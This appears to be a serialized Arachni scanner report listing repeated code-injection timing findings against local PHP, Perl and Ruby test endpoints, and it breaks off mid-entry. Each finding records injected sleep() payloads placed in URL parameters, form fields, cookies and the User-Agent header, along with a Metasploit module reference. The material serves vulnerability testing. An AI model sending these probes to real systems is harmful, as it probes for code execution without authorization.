description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/php/link/straight?input=default
elem: link
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' sleep(16000/1000);'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:follow_location: true
:injected: ! ' sleep(16000/1000);'
:combo:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:action: http://localhost:14309/php/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/php/link/straight?input=default
injected: ! ' sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:14309/php/cookie/straight
elem: cookie
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' sleep(16000/1000);'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ' sleep(16000/1000);'
:injected: ! ' sleep(16000/1000);'
:combo:
!binary "Y29va2ll": ! ' sleep(16000/1000);'
:action: http://localhost:14309/php/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:14309/php/cookie/straight
injected: ! ' sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=++sleep(16000/1000)%3B
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:14309/php/header/straight
elem: header
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' && sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' && sleep(16000/1000);'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! ' && sleep(16000/1000);'
:injected: ! ' && sleep(16000/1000);'
:combo:
User-Agent: ! ' && sleep(16000/1000);'
:action: http://localhost:14309/php/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:14309/php/header/straight
injected: ! ' && sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! ' && sleep(16000/1000);'
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/perl/form/straight
elem: form
method: POST
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' sleep(16000/1000);'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:follow_location: true
:injected: ! ' sleep(16000/1000);'
:combo:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:action: http://localhost:14309/perl/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/perl/form/straight
injected: ! ' sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/perl/link/straight?input=default
elem: link
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' sleep(16000/1000);'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:follow_location: true
:injected: ! ' sleep(16000/1000);'
:combo:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:action: http://localhost:14309/perl/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/perl/link/straight?input=default
injected: ! ' sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:14309/perl/cookie/straight
elem: cookie
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' sleep(16000/1000);'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ' sleep(16000/1000);'
:injected: ! ' sleep(16000/1000);'
:combo:
!binary "Y29va2ll": ! ' sleep(16000/1000);'
:action: http://localhost:14309/perl/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:14309/perl/cookie/straight
injected: ! ' sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=++sleep(16000/1000)%3B
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:14309/perl/header/straight
elem: header
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' && sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' && sleep(16000/1000);'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! ' && sleep(16000/1000);'
:injected: ! ' && sleep(16000/1000);'
:combo:
User-Agent: ! ' && sleep(16000/1000);'
:action: http://localhost:14309/perl/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:14309/perl/header/straight
injected: ! ' && sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! ' && sleep(16000/1000);'
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/ruby/form/straight
elem: form
method: POST
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' sleep(16000/1000);'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:follow_location: true
:injected: ! ' sleep(16000/1000);'
:combo:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:action: http://localhost:14309/ruby/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/ruby/form/straight
injected: ! ' sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/ruby/link/straight?input=default
elem: link
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' sleep(16000/1000);'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:follow_location: true
:injected: ! ' sleep(16000/1000);'
:combo:
!binary "aW5wdXQ=": ! ' sleep(16000/1000);'
:action: http://localhost:14309/ruby/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/ruby/link/straight?input=default
injected: ! ' sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:14309/ruby/cookie/straight
elem: cookie
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' sleep(__TIME__/1000);'
:skip_orig: true
:injected_orig: ! ' sleep(16000/1000);'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ' sleep(16000/1000);'
:injected: ! ' sleep(16000/1000);'
:combo:
!binary "Y29va2ll": ! ' sleep(16000/1000);'
:action: http://localhost:14309/ruby/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:14309/ruby/cookie/straight
injected: ! ' sleep(16000/1000);'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=++sleep(16000/1000)%3B
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
